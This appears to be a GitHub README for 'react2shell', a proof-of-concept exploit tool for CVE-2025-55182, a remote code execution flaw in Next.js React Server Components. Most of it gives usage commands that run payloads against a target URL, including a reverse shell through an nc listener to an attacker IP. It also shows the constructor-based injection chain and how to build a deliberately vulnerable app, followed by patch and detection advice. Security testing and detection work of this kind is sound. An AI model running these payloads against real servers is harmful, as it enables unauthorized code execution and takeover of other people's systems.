
A complete framework for exploiting the vulnerability CVE-2025-55182
A proof-of-concept exploit for CVE-2025-55182, a critical Remote Code Execution vulnerability in Next.js applications using React Server Components.
THIS TOOL IS FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING ONLY.
# Clone or download this repository
git clone https://github.com/zr0n/react2shell
cd react2shell
# Install dependencies
npm install form-data
node react2shell.js <target_url> <payload_type> [options]
node react2shell.js http://localhost:3000 basic
# Check server console for output: EXPLOITED: 50
# Get current user
node react2shell.js http://localhost:3000 whoami
# List files
node react2shell.js http://localhost:3000 dir
# System information
node react2shell.js http://localhost:3000 systeminfo
# Launch calculator
node react2shell.js http://localhost:3000 calc
# Launch notepad
node react2shell.js http://localhost:3000 notepad
node react2shell.js http://localhost:3000 file
# Check server directory for EXPLOITED.txt
# Terminal 1: Start listener
nc -lvnp 4444
# Terminal 2: Execute exploit
node react2shell.js http://localhost:3000 shell <YOUR_IP> 4444
# Works on both Windows (PowerShell) and Linux (Bash)
# Create project directory
mkdir vulnerable-nextjs-app
cd vulnerable-nextjs-app
# Initialize Next.js with vulnerable version
npx create-next-app@latest . --ts --app --no-eslint --tailwind
# Downgrade to vulnerable version
npm install [email protected]
# Install dependencies
npm install
app/page.tsx)export default function Home() {
return (
<div className="p-8">
<h1 className="text-4xl font-bold">Vulnerable Next.js App</h1>
<p className="mt-4">This app is vulnerable to CVE-2025-55182</p>
</div>
);
}
npm run dev
# Server runs on http://localhost:3000
The exploit leverages a deserialization vulnerability in React Server Components:
constructor.constructor to access the Function constructor_prefix field// Simplified vulnerability chain
{
_formData: {
get: '$3:constructor:constructor' // Access Function constructor
},
_prefix: 'YOUR_CODE_HERE//' // Injected code
}
Update Immediately:
npm update next@latest
npm update react@latest react-dom@latest
Verify Patched Versions:
npm list next react
Required Versions:
next-action headersLook for POST requests with:
next-actionmultipart/form-dataconstructor, _prefix, _formDataPOST / with next-action header
Suspicious FormData keys: 0, 1, 2, 3, 4
Response: 200 (successful exploitation) or 500 (failed)
This is an educational tool. Contributions that improve:
are welcome. DO NOT submit contributions that enhance attack capabilities.
Educational Use Only - No warranty provided
Luiz Fernando Ziron Created for cybersecurity education and awareness purposes.
By using this tool, you agree to:
Unauthorized access to computer systems is a crime in most jurisdictions.
Stay safe, stay ethical, stay legal. 🔒
| Payload | Description | Example |
|---|
basic | Mathematical proof of concept (7*7+1=50) | node react2shell.js http://target:3000 basic |
whoami | Display current system user | node react2shell.js http://target:3000 whoami |
dir | List current directory contents | node react2shell.js http://target:3000 dir |
systeminfo | Display operating system information | node react2shell.js http://target:3000 systeminfo |
file | Create EXPLOITED.txt proof file | node react2shell.js http://target:3000 file |
calc | Launch calculator (Windows visual proof) | node react2shell.js http://target:3000 calc |
notepad | Launch notepad (Windows visual proof) | node react2shell.js http://target:3000 notepad |
shell | Reverse shell (Windows/Linux auto-detect) | node react2shell.js http://target:3000 shell 10.10.10.5 4444 |